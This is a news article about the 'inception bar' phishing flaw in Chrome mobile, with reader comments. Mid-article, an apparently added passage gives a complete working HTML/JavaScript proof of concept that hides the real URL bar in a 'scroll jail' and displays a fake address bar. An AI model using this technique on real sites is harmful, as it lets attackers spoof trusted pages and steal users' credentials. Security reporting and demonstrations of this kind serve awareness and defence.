Chrome Mobile Susceptible to Phishing Attacks

A software developer has identified a simple exploit in the mobile version of Google Chrome that can be used for phishing attacks. He calls it “the inception bar.”

“In Chrome for mobile, when the user scrolls down, the browser hides the URL bar and hands the URL bar’s screen space to the web page,” developer James Fisher explains. “Because the user associates this screen space with ‘trustworthy browser UI,’ a phishing site can then use it to pose as a different site, by displaying its own fake URL bar – the inception bar!”

As Fisher explains it, that behavior is bad enough on its own. But because the page controls its own layout and scrolling, a malicious site can also keep the real address bar from ever coming back. Chrome normally restores the bar as soon as the user scrolls back up or reaches the top of the page; Fisher's page defeats that by moving its content, once the bar has been hidden, into a full-screen scrollable element he calls a “scroll jail,” so that every later scroll happens inside that element and the document itself never scrolls up.

That behavior explains Fisher’s name for the hack: in the movie Inception, characters enter dreams nested inside other dreams. “Like a dream in Inception, the user believes they’re in their own browser, but they’re actually in a browser within their browser,” he explains. “The user thinks they’re scrolling up in the page, but in fact, they’re only scrolling up in the scroll jail [in which the real address bar is never displayed].”
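The scroll-jail mechanism described above, as an added illustration that is not Fisher’s demo page or any code from this article: a single page that, once the document has scrolled far enough for the real toolbar to have collapsed, moves its content into a viewport-sized scrollable element and shows a clearly labelled fake bar in the space the real one vacated. The element names (`#jail`, `#fakebar`, `#content`), the scroll threshold, the spacer trick and the fake bar’s text are assumptions of this illustration, not details taken from Fisher’s page.

```html
<!doctype html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Inception bar demo (added illustration)</title>
<style>
  body { margin: 0; font-family: sans-serif; }
  /* The scroll jail: a fixed, viewport-sized box with its own scrollbar.
     overscroll-behavior: contain stops scrolling from chaining to the
     document when the user reaches the top of the jail, so the upward
     gesture that would bring the real URL bar back never reaches the browser. */
  #jail {
    display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100vh;
    overflow-y: scroll; overscroll-behavior: contain;
  }
  /* The fake bar lives at the top of the jail's content, in the space the
     real bar vacated. It is clearly labelled here; a phishing page would
     style it to match the victim's browser instead. */
  #fakebar {
    position: sticky; top: 0; background: #f1f3f4; padding: 8px;
    border-bottom: 1px solid #ccc;
  }
  #fakebar .url { display: block; background: #fff; border-radius: 16px; padding: 6px 12px; }
  #content { min-height: 300vh; padding: 16px; }
</style>
</head>
<body>
<div id="jail">
  <div id="fakebar"><span class="url">&#128274; DEMO fake bar: bank.example</span></div>
</div>
<div id="content">
  <p>Scroll down. On mobile Chrome the real URL bar collapses as you go.</p>
</div>
<script>
  // Assumption of this illustration: by the time the document has scrolled this
  // many pixels, the browser has already collapsed its toolbar.
  var THRESHOLD = 150;
  var jailed = false;

  function enterJail() {
    if (jailed) return;
    jailed = true;
    var jail = document.getElementById('jail');
    var content = document.getElementById('content');
    // Leave a spacer of the same height behind so the document stays scrollable
    // and stays scrolled down; the browser therefore has no reason to bring
    // its bar back (assumption of this illustration).
    var spacer = document.createElement('div');
    spacer.style.height = content.offsetHeight + 'px';
    document.body.appendChild(spacer);
    // Move the real content into the jail, underneath the fake bar, and size the
    // jail to the viewport as it is right now (toolbar hidden).
    jail.appendChild(content);
    jail.style.height = window.innerHeight + 'px';
    jail.style.display = 'block';
    // Keep the content roughly where the user was looking so the swap is not visible.
    jail.scrollTop = window.scrollY;
    // From here on every swipe scrolls the jail, not the document.
  }

  window.addEventListener('scroll', function () {
    if (window.scrollY > THRESHOLD) enterJail();
  });
</script>
</body>
</html>
```

Open the file in a mobile browser, scroll down until the real bar collapses, then scroll back up: what reappears is the sticky fake bar inside the jail, not the browser’s own UI. The page has no say over the browser’s own controls logic (a reload, a new tab or any browser gesture that forces the toolbar back will still expose the real address), so this only demonstrates the mechanism; it is not a reliable way to hold the bar hidden in every browser.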

In case it’s not obvious, the fake address bar can be styled to show the address and secure-site indicators of a bank or other service, and fool users into entering private data like user names and passwords. Fisher says he isn’t sure how a user could protect themselves from this flaw, and he views it, correctly, as a security flaw in Chrome mobile.

Google has not yet publicly commented on this issue. And, yes, I assume the new Chromium-based Edge is susceptible to this type of attack as well.

Conversation 5 comments

  • wright_is

    Premium Member
    29 April, 2019 - 8:59 am

    Chromium Edge won't be susceptible.

    Edge on Android or iOS, along with Firefox on mobile and most other mobile browsers, would be susceptible. That said, they would probably have the advantage that the phishing site would be programmed to look like Chrome for Android and looks different enough that a savvy user would notice that the inception bar doesn't look like their browser's normal title bar.

  • chrisrut

    Premium Member
    29 April, 2019 - 11:35 am

    This is reminiscent of tactics used by the USAF's "penetration squads" back in the 60s and 70s, which hacked commercial systems in order to learn how to make them secure. "Fake login screens" were used to great effect: so said my boss at Gemini Computers, who ran said programs, which resulted in the "Orange Book", and the NCSC.

    Human Factors views the user as the most important component in any system. Security views that same user as the weakest link.

  • IanYates82

    Premium Member
    29 April, 2019 - 5:18 pm

    I like how he even has 26 tabs open in the demo.

    It's a good fake.

    Except that 26 tabs was far too low. So many things pop open a browser tab that I interact with and then never return to.

  • clhodappp

    Premium Member
    30 April, 2019 - 4:31 am

    I've been wondering if something like this were possible ever since I discovered that pages could be made to force you to scroll back to the top to see the URL bar. Chrome needs to either not let pages do this or at least make some kind of reliable gesture to bring the top controls back.

  • dontbe evil

    17 May, 2019 - 7:25 am

    <p>what a surprise /s</p>

Thurrott © 2024 Thurrott LLC